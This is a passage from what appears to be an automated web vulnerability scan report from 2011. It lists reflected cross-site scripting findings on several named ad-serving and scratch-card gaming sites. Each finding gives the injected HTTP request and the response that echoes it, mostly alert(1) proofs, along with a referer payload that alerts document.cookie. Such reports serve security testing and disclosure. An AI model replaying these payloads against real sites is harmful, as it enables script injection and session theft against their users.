Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg8531a'-alert(1)-'f218f4a84b2&client=ca-pub-6939975784505313&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7543

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu May 12 17:46:05 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg8531a'-alert(1)-'f218f4a84b2&client=ca-pub-6939975784505313&adurl=http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1axx_nbap \">
...[SNIP]...

3.22. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47335"-alert(1)-"dcf5d98505f was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg47335"-alert(1)-"dcf5d98505f&client=ca-pub-6939975784505313&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7543

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu May 12 17:46:05 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg47335"-alert(1)-"dcf5d98505f&client=ca-pub-6939975784505313&adurl=http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1axx_nbap ");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var
...[SNIP]...

3.23. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7e4e'-alert(1)-'6d5b409016 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=Ld7e4e'-alert(1)-'6d5b409016&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7547

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Apr 28 10:48:35 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
et/click%3Bh%3Dv8/3b09/f/20f/%2a/y%3B240312816%3B0-0%3B0%3B63191625%3B4307-300/250%3B41923894/41941681/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=Ld7e4e'-alert(1)-'6d5b409016&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcw
...[SNIP]...

3.24. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c14c"-alert(1)-"6086ad86766 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L1c14c"-alert(1)-"6086ad86766&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7551

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Apr 28 10:48:35 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
et/click%3Bh%3Dv8/3b09/f/210/%2a/y%3B240312816%3B0-0%3B0%3B63191625%3B4307-300/250%3B41923894/41941681/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=L1c14c"-alert(1)-"6086ad86766&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcw
...[SNIP]...

3.25. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31b6f"-alert(1)-"f1e62c14a44 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=728x90&section=1703625&31b6f"-alert(1)-"f1e62c14a44=1 HTTP/1.1
Host: ad.yieldmanager.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE
Cookie: BX=ek8k2sl67ofpa&b=4&s=o9&t=39; ih="b!!!!$!.`.U!!!!#<y'ux!2$8S!!!!#<y'ui"; bh="b!!!!m!!Zwa!!!!#=!DU4!!ry1!!!!#=!msQ!!uoE!!!!(=!>P_!##!O!!!!#=!DU4!#*.a!!!!#=!o!R!#*VS!!!!#=!o!R!#*Xc!!!!#=!07,!#0%H!!!!#=!msS!#1*0!!!!#=!DU4!#1*h!!!!#=!DU4!#3pS!!!!#=!gBG!#3pv!!!!#=!gBG!#5(U!!!!#=!o!R!#5(W!!!!#=!07,!#5(X!!!!#=!o!R!#5(Y!!!!#=!gBG!#5(_!!!!#=!07,!#5(a!!!!#=!gBG!#5(c!!!!#=!o!R!#5(f!!!!#=!o!R!#C)^!!!!#=!Vkm!#Ie7!!!!#=!dO*!#T?O!!!!#=!dO*!#VSs!!!!#=!o!R!#Zb$!!!!#=!DU4!#Zbt!!!!#=!DU4!#b9/!!!!#<uEax!#b<Z!!!!#=!07,!#b<d!!!!#=!o!R!#b<e!!!!#=!gBG!#b<g!!!!#=!gBG!#b<i!!!!#=!gBG!#b<m!!!!#=!07,!#b<p!!!!#=!07,!#b<s!!!!#=!085!#b<t!!!!#=!085!#b='!!!!#=!gBG!#b?f!!!!#=!msI!#dxJ!!!!#=!DU4!#dxO!!!!#=!DU4!#g:`!!!!#=!DU4!#g=D!!!!#=!DU4!#gar!!!!#=!DU4!#h.N!!!!%=!>qI!#ncR!!!!#=!DU4!#sDa!!!!#=!$y[!#s`9!!!!#=!$y[!#s`=!!!!#=!$yh!#s`?!!!!#=!$yh!#s`D!!!!#=!$y[!#sa7!!!!#=!%!=!#sa:!!!!#=!%!=!#saD!!!!#=!%!=!#sgK!!!!#=!$y[!#sgS!!!!#=!$y[!#sgU!!!!#=!$y[!#sgV!!!!#=!$yh!#vA$!!!!#=!DU4!#x??!!!!'=!nv,!#yGL!!!!#=!DU4!$#4B!!!!#=!DU4!$#4C!!!!#=!DU4!$#4E!!!!#=!DU4!$#?.!!!!#=!Vki!$'?p!!!!#=!$y[!$'AB!!!!#=!$y[!$'AP!!!!#=!$y[!$'AR!!!!#=!$y[!$'AU!!!!#=!$yh!$'AY!!!!#=!%!=!$'L<!!!!#=!$y[!$(Tb!!!!#=!/l7"; uid=uid=c08a423c-7b10-11e0-8d2f-7fbc75b135eb&_hmacv=1&_salt=419862129&_keyid=k1&_hmac=80f2e481993e14f9e9c2e53c8bcda8051c813d3e

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:52:33 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 16 May 2011 12:52:33 GMT
Pragma: no-cache
Content-Length: 4324
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.yieldmanager.com/imp?31b6f"-alert(1)-"f1e62c14a44=1&Z=728x90&s=1703625&_salt=3404908760";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Ar
...[SNIP]...

3.26. http://bid.openx.net/json [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload aba86<script>alert(1)</script>c1e227c2a98 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?c=OXM_6670393876aba86<script>alert(1)</script>c1e227c2a98&pid=d6536fd1-a88d-43f5-b56c-d55966e08548&s=728x90&f=0.56&url=http%3A%2F%2Fad.doubleclick.net%2FN6707%2Fadi%2Fmeta.homepage%2FadminMsg%3Bpos%3Dfooter%3Bsz%3D728x90%3Batf%3Dno%3Bname%3Dleaderboardfooter%3BpageURL%3Dwww.metacafe.com%252Ffplayer%252F%253F4702d%2522%253E%253Cscript%253Ealert%2528document.cookie%2529%253C%252Fscript%253Ebe96a23f3a3%253D1%3Bstudio%3Dnull%3Bsection%3Dnull%3Bcategory%3Dnull%3Bchannel%3Dnull%3Brating%3Dclean%3Bhd%3Dno%3Benv%3Dprod%3Bbranding%3Dnull%3Bfbconnected%3Dfalse%3Bffilter%3Dtrue%3Breferrer%3Dnull%3BLEID%3D40%3Btile%3D9%3Bord%3D4284276430058379&cid=oxpv1%3A34-632-1929-1558-4408&hrid=b7d3130441279250d437d1e5dbea5016-1305550329 HTTP/1.1
Host: bid.openx.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE
Cookie: i=de6f5b1d-dd7a-4d95-8142-2b91139d25bd; p=1305468134

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=282eed89-72f0-45c6-8111-20529e7e7fdf; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1305550335; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_6670393876aba86<script>alert(1)</script>c1e227c2a98({"r":"\u003cdiv style\u003d\"position: absolute; width: 0px; height: 0px; overflow: hidden\"\u003e\u003cimg src\u003d\"http://bid.openx.net/log?l\u003dH4sIAAAAAAAAAI3PvU7DMBAH8H-TNnXtli4FxMB3JyQjp06MP
...[SNIP]...

3.27. http://rtb50.doubleverify.com/rtb.ashx/verifyc [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rtb50.doubleverify.com
Path:   /rtb.ashx/verifyc

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 4a935<script>alert(1)</script>c320f4b1392 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rtb.ashx/verifyc?ctx=741233&cmp=5384441&plc=62171182&sid=1037707&num=5&ver=2&dv_url=http%3A//ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg%3Bpos%3Dfooter%3Bsz%3D728x90%3Batf%3Dno%3Bname%3Dleaderboardfooter%3BpageURL%3Dwww.metacafe.com%252Ffplayer%252F%253F4702d%2522%253E%253Cscript%253Ealert%2528document.cookie%2529%253C%252Fscript%253Ebe96a23f3a3%253D1%3Bstudio%3Dnull%3Bsection%3Dnull%3Bcategory%3Dnull%3Bchannel%3Dnull%3Brating%3Dclean%3Bhd%3Dno%3Benv%3Dprod%3Bbranding%3Dnull%3Bfbconnected%3Dfalse%3Bffilter%3Dtrue%3Breferrer%3Dnull%3BLEID%3D40%3Btile%3D9%3Bord%3D4284276430058379&callback=__verify_callback_3834651037884a935<script>alert(1)</script>c320f4b1392 HTTP/1.1
Host: rtb50.doubleverify.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Date: Mon, 16 May 2011 12:52:00 GMT
Connection: close
Content-Length: 74

__verify_callback_3834651037884a935<script>alert(1)</script>c320f4b1392(2)

3.28. http://scratch.co.uk/ [currency parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The value of the currency request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f52a7"><script>alert(1)</script>f3c08612d87 was submitted in the currency parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?currency=USDf52a7"><script>alert(1)</script>f3c08612d87 HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:27 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:27 GMT; path=/
Set-Cookie: currency=USDf52a7%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef3c08612d87; expires=Wed, 15-Jun-2011 12:25:27 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:27 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('USDf52a7"><script>alert(1)</script>f3c08612d87', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.29. http://scratch.co.uk/ [currency parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The value of the currency request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 737fc"%3balert(1)//814391c7445 was submitted in the currency parameter. This input was echoed as 737fc";alert(1)//814391c7445 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?currency=USD737fc"%3balert(1)//814391c7445 HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:27 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:27 GMT; path=/
Set-Cookie: currency=USD737fc%22%3Balert%281%29%2F%2F814391c7445; expires=Wed, 15-Jun-2011 12:25:27 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:27 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<script type="text/javascript">
$(document).ready(function() {
flashembed("middleflash", {src: "/images/scratch3a.swf?clickTag=javascript:openScratch('USD737fc";alert(1)//814391c7445', 'ENG', 'direct-173|193|214|243');", w3c: true, wmode: "transparent"}, {
monthlyprizetext: 'Won Last Month',
               monthlyprize: '&pound;53,521,715',
               topprizetext: 'Scratch &pound
...[SNIP]...

3.30. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx [CUR parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/Lobby.aspx

Issue detail

The value of the CUR request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef230'%3balert(1)//49f697934b was submitted in the CUR parameter. This input was echoed as ef230';alert(1)//49f697934b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ScratchCards/Lobby.aspx?CUR=GBPef230'%3balert(1)//49f697934b&CSI=20&LNG=~ENG&BD=home.okscratchcards.com&SDN=okscratchcards.com&CKI= HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=dxeuyd55fuapfle5trgjlp45; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19499


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
UserName='-';
       var PlayMode='';
       var LastPage='-';
var Gender = '';
var Depositor = '';
var LastDepositStatus = '';
var ErrorCode='';
var Currency='GBPef230';alert(1)//49f697934b';
var Language='ENG';
       var iFrameIndex=0;

   var bRequestedClose = false; //Flag to indicate a close request to prevent double close of the window
   function ReloadPage(pLanguageCode,pCur
...[SNIP]...

3.31. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx [PRD parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/Lobby.aspx

Issue detail

